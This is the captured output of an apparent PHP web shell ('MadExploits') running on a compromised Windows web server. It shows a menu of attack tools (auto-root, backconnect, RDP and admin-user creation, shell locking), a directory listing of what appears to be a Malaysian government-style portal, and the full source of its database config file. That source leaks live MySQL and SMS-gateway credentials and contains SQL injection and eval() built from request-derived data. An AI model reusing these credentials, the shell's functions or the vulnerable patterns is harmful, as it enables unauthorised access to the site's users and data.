Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
htdocs /
edgpens /
[ HOME SHELL ]
Name
Size
Permission
Action
backup
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
dashboard
[ DIR ]
drwxrwxrwx
edg
[ DIR ]
drwxrwxrwx
extension
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
inc
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
kod
[ DIR ]
drwxrwxrwx
patch
[ DIR ]
drwxrwxrwx
pdf
[ DIR ]
drwxrwxrwx
reports
[ DIR ]
drwxrwxrwx
upload
[ DIR ]
drwxrwxrwx
utility
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxrwx
.htaccess.backup
1.24
KB
-rw-rw-rw-
!test.php
17
B
-rw-rw-rw-
MalaysiaBooks.php
3.67
KB
-rw-rw-rw-
Nota14102020.docx
22.8
KB
-rw-rw-rw-
access.php
268
B
-rw-rw-rw-
access2.php
245
B
-rw-rw-rw-
account_recovery.php
8.4
KB
-rw-rw-rw-
account_recovery_test.php
6.3
KB
-rw-rw-rw-
ajax.php
4.02
KB
-rw-rw-rw-
banner.php
73.61
KB
-rw-rw-rw-
company_search.php
8.38
KB
-rw-rw-rw-
composer.json
1.5
KB
-rw-rw-rw-
composer.lock
173.77
KB
-rw-rw-rw-
ctype.txt
266
B
-rw-rw-rw-
custom.css
3.7
KB
-rw-rw-rw-
custom.js
9.88
KB
-rw-rw-rw-
custom200630.js
6.46
KB
-rw-rw-rw-
custom_200630.css
1.04
KB
-rw-rw-rw-
custom_200705.js
6.82
KB
-rw-rw-rw-
dashboard.php
5.71
KB
-rw-rw-rw-
dashboard_old.php
51
B
-rw-rw-rw-
dbedgpens.sql
3.85
MB
-rw-rw-rw-
dglist.php
3.97
KB
-rw-rw-rw-
dgweb-dg.txt
2.65
MB
-rw-rw-rw-
dgweb.xls
297.5
KB
-rw-rw-rw-
err_404.php
75
B
-rw-rw-rw-
f_declaration.php
515
B
-rw-rw-rw-
frame.php
1.46
KB
-rw-rw-rw-
gip.php
1.51
KB
-rw-rw-rw-
gip1.php
7
B
-rw-rw-rw-
imp_data.php
2.03
KB
-rw-rw-rw-
index_footer.php
138
B
-rw-rw-rw-
index_head.php
663
B
-rw-rw-rw-
index_search.php
667
B
-rw-rw-rw-
ins_composer.php
417
B
-rw-rw-rw-
ktn-pens-companies.txt
330.12
KB
-rw-rw-rw-
ktn-pens-port.txt
602.81
KB
-rw-rw-rw-
ktn-pens-vessel.txt
6.12
MB
-rw-rw-rw-
ktn-pens-vtype.txt
353
B
-rw-rw-rw-
login.php
12.14
KB
-rw-rw-rw-
login_200704.php
9.81
KB
-rw-rw-rw-
main.php
644
B
-rw-rw-rw-
nota.txt
120
B
-rw-rw-rw-
odbc.php
24.03
KB
-rw-rw-rw-
odbc_test.php
15.24
KB
-rw-rw-rw-
readtext.php
7.99
KB
-rw-rw-rw-
recover_msg.php
806
B
-rw-rw-rw-
registration.php
27.31
KB
-rw-rw-rw-
registration_2.php
12.94
KB
-rw-rw-rw-
registration_submit.php
6.85
KB
-rw-rw-rw-
reset_password.php
9.55
KB
-rw-rw-rw-
self_register.php
14.58
KB
-rw-rw-rw-
self_register_230312.php
14.57
KB
-rw-rw-rw-
sessions.php
2.78
KB
-rw-rw-rw-
sessions_200705.php
1.4
KB
-rw-rw-rw-
sessions_200721.php
1.75
KB
-rw-rw-rw-
test.php
11.8
KB
-rw-rw-rw-
test_sess.php
1.35
KB
-rw-rw-rw-
testedg.txt
7
B
-rw-rw-rw-
testing.txt
7
B
-rw-rw-rw-
testinput.php
6.7
KB
-rw-rw-rw-
testx.php
4
B
-rw-rw-rw-
user.php
160.56
KB
-r--r--r--
vessel.txt
498.07
KB
-rw-rw-rw-
vessel2.txt
249.04
KB
-rw-rw-rw-
zzz
11
B
-rw-rw-rw-
zzz.txt
249.04
KB
-rw-rw-rw-
~$ta14102020.docx
162
B
-rw-rw-rw-
~WRL0738.tmp
23.29
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : odbc.php
<?php error_reporting(1); date_default_timezone_set('Asia/Kuala_Lumpur'); $GLOBALS['mysqli'] = new mysqli("172.16.0.67", "edgpens", "c6IRnSzhF87XFGtE", "edgpens"); if ($mysqli->connect_errno) { echo "Failed to connect to MySQL: (" . $mysqli_link->connect_errno . ") " . $mysqli_link->connect_error; exit(); } $mysqli_link = new mysqli("172.16.0.67", "edgpens", "c6IRnSzhF87XFGtE", "edgpens"); if ($mysqli_link->connect_errno) { echo "Failed to connect to MySQL: (" . $mysqli_link->connect_errno . ") " . $mysqli_link->connect_error; } $svr_http = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on'? "https://" : "http://"; $svr_port = isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '80'? "" : ":".$_SERVER['SERVER_PORT']; $stmt = $mysqli->stmt_init(); $stmt->prepare("SELECT a.*, b.username sms_username, b.password sms_password, b.sendid sms_sendid FROM utiliti_web_config a CROSS JOIN utiliti_sms b"); $stmt->execute(); $result = $stmt->get_result(); $stmt->close(); $aa = $result->fetch_assoc(); $GLOBALS['conf_fullname'] = $aa['fullname']; $GLOBALS['conf_shortname'] = $aa['shortname']; $GLOBALS['conf_maxuploadsize'] = $aa['maxuploadsize']; $GLOBALS['conf_weblink'] = $aa['weblink']; $GLOBALS['conf_fullweblink'] = (substr($conf_weblink,0,4)=="http") ? $conf_weblink : $svr_http.$_SERVER["SERVER_NAME"].$svr_port.$aa['weblink']; $GLOBALS['conf_log_attempt'] = $aa['log_attempt']; $GLOBALS['conf_sess_timeout'] = $aa['sess_timeout']; $GLOBALS['conf_pass_min'] = $aa['pass_min']; $GLOBALS['conf_pass_max'] = $aa['pass_max']; $GLOBALS['conf_pass_digit'] = ($aa['pass_digit']==1) ? 'true' : 'false'; $GLOBALS['conf_pass_symbol'] = ($aa['pass_symbol']==1) ? 'true' : 'false'; $GLOBALS['conf_pass_upcase'] = ($aa['pass_upcase']==1) ? 'true' : 'false'; $GLOBALS['conf_pass_locase'] = ($aa['pass_locase']==1) ? 'true' : 'false'; $GLOBALS['conf_pass_expired'] = $aa['pass_expired']; $GLOBALS['conf_pass_text'] = $aa['pass_text']; $GLOBALS['conf_sms_username'] = $aa['sms_username']; $GLOBALS['conf_sms_password'] = $aa['sms_password']; $GLOBALS['conf_sms_sendid'] = $aa['sms_sendid']; unset($result); unset($aa); $stmt = $mysqli->stmt_init(); $stmt->prepare("SELECT * FROM kod_doctype WHERE flagAktif='Y'"); $stmt->execute(); $result = $stmt->get_result(); $stmt->close(); $conf_doctype1 = array(); $conf_doctype2 = ""; $conf_doctype3 = ""; $conf_doctype4 = array(); $GLOBALS['conf_doctype5'] = array(); while($aa = $result->fetch_assoc()){ array_push($conf_doctype1, $aa['doctype']); $conf_doctype2.=' .'.$aa['doctype'].','; $conf_doctype3.=' *.'.$aa['doctype'].','; array_push($conf_doctype4, '.'.$aa['doctype']); $conf_doctype5[$aa['doctype']]=$aa['mime']; } $conf_doctype2 = substr($conf_doctype2,1,-1); $conf_doctype3 = substr($conf_doctype3,1,-1); unset($result); unset($aa); //---------------------------------------------------------------------------------- // Delete a session and return. //---------------------------------------------------------------------------------- function deleteSession($session){ global $mysqli; // $query="DELETE FROM utiliti_session WHERE iduser!=1 AND session = '$session'"; $query="DELETE FROM utiliti_session WHERE session = '$session'"; $mysqli->query($query); return; } //---------------------------------------------------------------------------------- // Update session time if it exists. //---------------------------------------------------------------------------------- function updateSession($session){ global $mysqli; checkSession(); $query="SELECT * FROM utiliti_session WHERE session='$session'"; $result=$mysqli->query($query); $row=$result->fetch_assoc(); if($row){ $time=getdate(time()); $s="update utiliti_session set masa='".$time['year']."-".$time['mon']."-".$time['mday']." ".$time['hours'].":".$time['minutes'].":".$time['seconds']."' where session='$session'"; if(!$r=$mysqli->query($s)) echo $s."<br>Fail to updating the session ".$r; }else{ $session=false; } return $session; } //---------------------------------------------------------------------------------- // Log user in. If user already has a session then security risk. Throw them out. //---------------------------------------------------------------------------------- function login($passedusername,$passedpassword){ global $mysqli, $conf_log_attempt; checkSession(); $passedpassword= md5($passedpassword); // $query="SELECT * FROM utiliti_user WHERE up_id='$passedusername'"; // $result=$mysqli->query($query) or die(mysqli_error($mysqli)); $stmt = $mysqli->stmt_init(); $stmt->prepare("SELECT * FROM user_list WHERE emailUser=?"); // $stmt->prepare("SELECT * FROM user_list"); $emailUser = $passedusername; $stmt->bind_param("s",$emailUser); $stmt->execute(); $result = $stmt->get_result(); $stmt->close(); $session = array(); $row = $result->fetch_assoc(); $usertype = 1; if(!$row){ // utk user yang belum ada dalam user_list $stmt = $mysqli->stmt_init(); $stmt->prepare("SELECT * FROM user_register WHERE emailUser=? AND flagUser=2 AND status=1"); $emailUser = $passedusername; $stmt->bind_param("s",$emailUser); $stmt->execute(); $result = $stmt->get_result(); $stmt->close(); $session = array(); $row = $result->fetch_assoc(); $usertype = 2; } unset($result); $stmt = $mysqli->stmt_init(); $stmt->prepare("SELECT * FROM utiliti_login WHERE idUser=? AND user_type=? AND attempt_date=CURDATE()"); $idUser = $row['idUser']; $user_type = $usertype; $stmt->bind_param("ss",$idUser,$user_type); $stmt->execute(); $result = $stmt->get_result(); $stmt->close(); $ulogin = $result->fetch_assoc(); $uid = $ulogin['id']; $ucnt = ($ulogin) ? $ulogin['attempt_count'] : 0; if($ucnt < $conf_log_attempt){ if($row){ $userid = $row['idUser']; $nama = strtoupper($row['nameUser']); $password = $row['passwordUser']; $trkMula = $row['date_start']; $trkTamat = $row['date_end']; $flagUser = ($usertype==2) ? 1 : $row['flagUser'] ; if($password==$passedpassword){ if($flagUser == 3){ $session[0] = "Ops! Something Wrong.<br>Please Contact System Administrators."; $session[1] = false; $session[3] = 1; }else if($flagUser == 2){ $session[0] = "Ops! Your Login Have Been Blocked.<br>Please Contact System Administrators."; $session[1] = false; $session[3] = 1; // }if(empty($trkMula)){ // $session[0] = "Ops! Something Wrong.<br>Please Contact System Administrators."; // $session[1] = false; // $session[3] = 1; // }else if ($trkTamat!='' And $trkTamat<>'0000-00-00' And $trkTamat<date("Y-m-d")){ // $t=strtotime ($trkTamat); // $session[0] = "You Cannot Enter This System Anymore. Started From ".date("d-M-Y",$t); // $session[1] = false; // $session[3] = 1; // }else if ( $trkMula>date("Y-m-d")){ // $t=strtotime ($trkMula); // $session[0] = "You Can Access This System Start From ".date("d-M-Y",$t); // $session[1] = false; // $session[3] = 1; }else {//ok to proceed. log_attempts($idUser,$user_type,2,$uid); // clear count for today $session[0] = "Welcome Back. {$nama}"; $session[1] = checkUser($userid,$usertype); //check to see if user is already logged in $session[3] = 0; if ($session[1]){ deleteSession($session[1]);//Force the user out if already logged in $session[1]=setSession($userid,$usertype); }else{ $session[1]=setSession($userid,$usertype); } } }else{ log_attempts($idUser,$user_type,1,$uid); $ucntreal = $conf_log_attempt-($ucnt+1); if($ucntreal==0){ if($usertype==2) $session[0] = "Too Many Attempts. Account Locked For Today! <hr>You Can Try Unlock It With <br>Forgot Password"; else $session[0] = "Too Many Attempts. Account Locked For Today! <hr>You Can Try Unlock It With <br>Forgot Password / Contact The Admins"; }else{ $session[0] = "Please Try Again! <hr>You Got <b>{$ucntreal}</b> More Attempt/s Left Before The Account Get Locked."; } $session[1] = false; $session[3] = 1; } }else{ $session[0] = "Please Try Again!"; $session[1] = false; $session[3] = 1; } }else{ if($usertype==2) $session[0] = "Too Many Attempts. Account Locked For Today! <hr>You Can Try Unlock It With <br>Forgot Password"; else $session[0] = "Too Many Attempts. Account Locked For Today! <hr>You Can Try Unlock It With <br>Forgot Password / Contact The Admins"; $session[1] = false; $session[3] = 1; } return $session; } function log_attempts($iduser,$usertype,$log_type,$uid = 0,$unlock_iduser = 0){ global $mysqli; $stmt = $mysqli->stmt_init(); if($log_type==1){ // locked if(!empty($uid)){ // update $stmt->prepare("UPDATE utiliti_login SET attempt_count=attempt_count+1 WHERE id='{$uid}'"); $stmt->execute(); }else{ // insert $stmt->prepare("INSERT INTO utiliti_login (idUser,user_type,attempt_date,attempt_count) VALUES ('{$iduser}','{$usertype}',NOW(),1) "); $stmt->execute(); } }else{ // unlocked if(!empty($uid)){ $stmt->prepare("UPDATE utiliti_login SET attempt_count=0 WHERE id='{$uid}'"); $stmt->execute(); }else{ if($unlock_iduser==0){ $stmt->prepare("UPDATE utiliti_login SET attempt_count=0 WHERE idUser='{$iduser}' AND user_type='{$usertype}' AND attempt_date=CURDATE() "); }else{ $stmt->prepare("UPDATE utiliti_login SET attempt_count=0, unlock_idUser='{$unlock_iduser}', unlock_date=CURDATE() WHERE idUser='{$iduser}' AND user_type='{$usertype}' AND attempt_date=CURDATE() "); } $stmt->execute(); } } } //---------------------------------------------------------------------------------- // Set a session and insert session into session table. //---------------------------------------------------------------------------------- function setSession($userid,$usertype){ global $mysqli; $time=getdate(time()); $length=80;// set this to the length of session variable desired $session=""; mt_srand(time()); $sessionstring="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; $achar=strlen($sessionstring)-1; for ($i=0;$i<$length;$i++){ $session.=$sessionstring[mt_rand(0,$achar)]; } $session=$userid.$session; $query = "INSERT INTO utiliti_session (session,idUser,masa,usertype) VALUES ('$session','$userid','".$time['year']."-".$time['mon']."-".$time['mday']." ".$time['hours'].":".$time['minutes'].":".$time['seconds']."',$usertype)"; $mysqli->query($query) or die(mysqli_error($mysqli)); return $session; } //-------------------------------------------------------------------------------- // Check the user to see if they are already logged in. //-------------------------------------------------------------------------------- function checkUser($userid,$usertype){ global $mysqli; $query="SELECT * FROM utiliti_session WHERE idUser = '$userid' AND usertype = '$usertype'"; $result=$mysqli->query($query); $row=$result->fetch_assoc(); if ($row){ $session=$row['session']; }else{ $session = false; } return $session; } //---------------------------------------------------------------------------------- // Log the user out when they click on the log-out button //---------------------------------------------------------------------------------- function logout($session){ global $mysqli; $query="SELECT * FROM utiliti_session WHERE session = '$session'"; $result=$mysqli->query($query); $row=$result->fetch_assoc(); if ($row){ $userid=$row['idUser']; deleteSession($session); return true; }else{ return false; } } //---------------------------------------------------------------------------------- // Check session and return. //---------------------------------------------------------------------------------- function checkSession(){ global $mysqli, $conf_sess_timeout; $expirationtime=time()-($conf_sess_timeout*60); // set this to seconds of inactivity before forced logout (30mins) // $expirationtime=time()-6000; // set this to seconds of inactivity before forced logout (100mins) // $usr = get_user($sess); // $usertype = $usr['usertype']; // $cond = " AND usertype='{$usertype}' "; $time=getdate($expirationtime); $query = "SELECT idUser,session,masa From utiliti_session WHERE masa < '".$time['year']."-".$time['mon']."-".$time['mday']." ".$time['hours'].":".$time['minutes'].":".$time['seconds']."' "; $result=$mysqli->query($query) or die(mysqli_error($mysqli)); while($row=$result->fetch_assoc()){ deleteSession($row['session']); } return; } function growl_me($sess = null,$g_scc){ $type = $g_scc; $msg = (!empty($sess)) ? $sess['success_msg'] : ""; if($g_scc == 1 && !empty($sess['success_msg'])){ echo "<script>$(document).ready(function(){ $.testme({$type},\"{$msg}\"); });</script>"; } if($g_scc == 2 && !empty($sess['success_msg'])){ echo "<script>$(document).ready(function(){ $.testme({$type},\"{$msg}\"); });</script>"; } if($g_scc == 3 && !empty($sess['success_msg'])){ echo "<script>$(document).ready(function(){ $.testme({$type},\"{$msg}\"); });</script>"; } } function get_user($sess){ global $mysqli; $query="SELECT * FROM utiliti_session WHERE session='$sess'"; $result=$mysqli->query($query); $row=$result->fetch_assoc(); // $stmt->prepare("SELECT * FROM utiliti_session WHERE session=?"); // $running_sql = $sess; // $stmt->bind_param("s",$iduser,$running_sql,$descr); // $stmt->execute(); // $result = $stmt->get_result(); // $row = $result->fetch_assoc(MYSQLI_ASSOC); // $stmt->close(); return $row; } function get_user_full($sess){ global $mysqli; $query="SELECT * FROM utiliti_session WHERE session='$sess'"; $result=$mysqli->query($query); $row=$result->fetch_assoc(); if($row['usertype']==1){ $table = "user_list"; $query="SELECT a.*, if(DATE_FORMAT(NOW(),'%Y-%m-%d') >= DATE_FORMAT(date_add(a.datePassword, INTERVAL b.pass_expired day),'%Y-%m-%d'),'Y','N') pass_exp, 'Y' registered FROM {$table} a cross join utiliti_web_config b WHERE a.idUser='{$row['idUser']}'"; } else{ $table = "user_register"; $query="SELECT a.*, 'N' pass_exp, 'N' registered FROM {$table} a cross join utiliti_web_config b WHERE a.idUser='{$row['idUser']}'"; } $result=$mysqli->query($query); $row=$result->fetch_assoc(); return $row; } function mysqli_prepare_audit($sql,$param_type,$param_data,$param_do = null,$query_type = null){ /* Hamdi : 2020-03-20 This Function Only for Insert/Update/Delete use. */ global $mysqli; $user = get_user($_SESSION['session']); $conn = $mysqli; $stmt = $conn->stmt_init(); $stmt->prepare($sql); $comb_param = ""; $length_type = strlen($param_type); $length_data = count($param_data); $type_auto = ""; foreach ($param_data as $a => $b) { $comb_param1 .= "\${$a}=\"{$b}\","; $comb_param2 .= "\${$a}=\"{$b}\",\n"; $type_auto .= "s"; } if($length_type != $length_data || $param_type == 'auto') $param_type = $type_auto; $data = array(); $comb_param1 = substr($comb_param1, 0, -1); $comb_param2 = $sql.";\n".substr($comb_param2, 0, -2); "\$stmt->bind_param(\"".$param_type."\",".$comb_param1.");"; eval("\$stmt->bind_param(\"".$param_type."\",".$comb_param1.");"); if (!$stmt->execute()) { echo 'error executing statement: ' . $stmt->error; $stmt->close(); }else{ $data[0] = $mysqli->insert_id; $stmt->close(); audit_insert($comb_param2,$param_do); } return $data; } function mysqli_prepare_all($sql,$param_type,$param_data){ /* Hamdi : 2020-12-07 This Function for All Query. */ global $mysqli; // $user = get_user($_SESSION['session']); $conn = $mysqli; $stmt = $conn->stmt_init(); $stmt->prepare($sql); $comb_param = ""; $length_type = strlen($param_type); $length_data = count($param_data); $type_auto = ""; foreach ($param_data as $a => $b) { $comb_param1 .= "\${$a}=\"{$b}\","; $comb_param2 .= "\${$a}=\"{$b}\",\n"; $type_auto .= "s"; } if($length_type != $length_data || $param_type == 'auto') $param_type = $type_auto; $data = array(); $comb_param1 = substr($comb_param1, 0, -1); $comb_param2 = $sql.";\n".substr($comb_param2, 0, -2); "\$stmt->bind_param(\"".$param_type."\",".$comb_param1.");"; eval("\$stmt->bind_param(\"".$param_type."\",".$comb_param1.");"); $stmt->execute() or trigger_error($stmt->error, E_USER_ERROR); ($result = $stmt->get_result()) or trigger_error($stmt->error, E_USER_ERROR); $stmt->close(); return $result; } function audit_insert($running_sql,$descr = null){ global $mysqli; if(!empty($_SESSION['session'])) $user = get_user_full($_SESSION['session']); else $user = ""; $stmt = $mysqli->stmt_init(); $stmt->prepare("insert into audit_trail (idUser,running_sql,descr,ipaddress,idRoles,idSubRoles,register_user) values (?,?,?,?,?,?,?)"); $iduser = $user['idUser']; $idRoles = $user['idRoles']; $registered = $user['registered']; $idSubRoles = ($registered == 'Y') ? $user['idSubRoles'] : 0 ; $ipaddress = get_ipclient(); // $running_sql = $comb_param2; $descr = (empty($descr)) ? '' : $descr ; $stmt->bind_param("sssssss",$iduser,$running_sql,$descr,$ipaddress,$idRoles,$idSubRoles,$registered); $stmt->execute(); $stmt->close(); } function mysql_date($date){ explode('-', $date); return $date[3]."-".$date[2]."-".$date[1]; } function get_ipclient(){ $ip = ''; if(!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } else{ $ip = $_SERVER['REMOTE_ADDR']; } return $ip; } // function mysqli_prepare_audit2(){ // global $mysqli; // $stmt = $mysqli->stmt_init(); // $stmt->prepare($sql); // $comb_param = ""; // $length_type = strlen($param_type); // $length_data = count($param_data); // $type_auto = ""; // foreach ($param_data as $a => $b) { // $comb_param1 .= "\${$a}=\"{$b}\","; // $comb_param2 .= "\${$a}=\"{$b}\",\n"; // $type_auto .= "s"; // } // if($length_type != $length_data || $param_type == 'auto') // $param_type = $type_auto; // $data = array(); // $comb_param1 = substr($comb_param1, 0, -1); // $comb_param2 = $sql.";\n".substr($comb_param2, 0, -2); // "\$stmt->bind_param(\"".$param_type."\",".$comb_param1.");"; // eval("\$stmt->bind_param(\"".$param_type."\",".$comb_param1.");"); // $stmt->execute(); // // execute the stored Procedure // $result = $connect->query('call IsUserPresent(@uid, @userCount)'); // // getting the value of the OUT parameter // $r = $connect->query('SELECT @userCount as userCount'); // $row = $r->fetch_assoc(); // } function test_loop($id){ // $s2="SELECT * from user_list"; // $stmt = $mysqli->prepare($s2); // $stmt->bind_param("s",$id); // $stmt->execute(); // $result = $stmt->get_result(); // $stmt->close(); // echo $jum = $stmt->num_rows; // echo $id; // echo "<br>"; // global $mysqli; // $s2="SELECT * from user_list where idUser = 1"; // $stmt = $mysqli->prepare($s2); // $stmt->bind_param("s",$id); // $stmt->execute(); // $result = $stmt->get_result(); // echo $jum = $result->num_rows; // $stmt->close(); // print_r($result); // $sql = "SELECT lokasi,tujuan,flaglulus,catatan FROM tugasluar WHERE (idPekerja=? AND (? BETWEEN tarikhMula AND tarikhTamat))"; // $param_data = array( // "idPekerja" => $idPekerja, // "tarikhUrusan" => $tarikhUrusan, // ); // $result = mysqli_prepare_all($sql,"auto",$param_data); // echo $result->num_rows; // $sql = "SELECT * FROM user_list WHERE (idUser=? AND (? BETWEEN dateCreated AND dateModified))"; $sql = "SELECT * FROM user_list WHERE idUser=? "; $param_data = array( "idUser" => $id ); $result = mysqli_prepare_all($sql,"auto",$param_data); echo $result->num_rows; // $zsd = ; print_r($result->fetch_assoc()); // echo $zsd['emailUser']; // print_r(); } function ismscURL($link,$again = null){//hamdi /* HARD CODE NO IJAN */ // $search = "/(&dstno=)(.*)(&msg)/"; // $replace = "&dstno=0199160201&msg"; // $link = preg_replace($search,$replace,$link); /* END HARD CODE */ /* [2019-05-23] TUKAR USERNAME DAN PASSWORD ISMS Perubahan API iSMS */ global $conf_sms_username, $conf_sms_password, $conf_sms_sendid; // $username = urlencode("fifwaysms"); // $password = urlencode("f1fw4y123"); $username = urlencode($conf_sms_username); $password = urlencode($conf_sms_password); $link_old = $link; $search = "/(http:)(.*)(&dstno)/"; if(!empty($again)) $replace = "http://www.isms.com.my/isms_send.php?un=$username&pwd=$password&dstno"; else $replace = "https://www.isms.com.my/isms_send.php?un=$username&pwd=$password&dstno"; $link = preg_replace($search,$replace,$link); $link .= "&type=1&sendid={$conf_sms_sendid}&agreedterm=YES"; /* END TUKAR */ $http = curl_init($link); curl_setopt($http, CURLOPT_RETURNTRANSFER, TRUE); $http_result = curl_exec($http); $http_status = curl_getinfo($http, CURLINFO_HTTP_CODE); curl_close($http); if($http_result == "2000 = SUCCESS"){ $http_result = "SMS Telah Berjaya Dihantar"; } else{ if(empty($again)) ismscURL($link_old,"http"); } return $http_result; } function checkupload($files){ $conf_maxuploadsize = $GLOBALS['conf_maxuploadsize']; try { // Undefined | Multiple Files | $_FILES Corruption Attack // If this request falls under any of them, treat it invalid. if( !isset($files['error']) || is_array($files['error']) ){ throw new RuntimeException('Invalid parameters.'); } // Check $_FILES['upfile']['error'] value. switch ($files['error']) { case UPLOAD_ERR_OK: break; case UPLOAD_ERR_NO_FILE: throw new RuntimeException('No file sent.'); case UPLOAD_ERR_INI_SIZE: case UPLOAD_ERR_FORM_SIZE: throw new RuntimeException('Exceeded filesize limit.'); default: throw new RuntimeException('Unknown errors.'); } // You should also check filesize here. // $filesize = $files['size'] / 1024 / 1024; $filesize = round($files['size'] / 1024 / 1024, 1); if ($filesize > $conf_maxuploadsize) { throw new RuntimeException('Exceeded filesize limit.'); } // DO NOT TRUST $_FILES['upfile']['mime'] VALUE !! // Check MIME Type by yourself. $finfo = new finfo(FILEINFO_MIME_TYPE); if (false === $ext = array_search( $finfo->file($files['tmp_name']), $conf_doctype5, true )) { throw new RuntimeException('Invalid file format.'); } return ""; }catch (RuntimeException $e) { return $e->getMessage(); } } ?>
Close
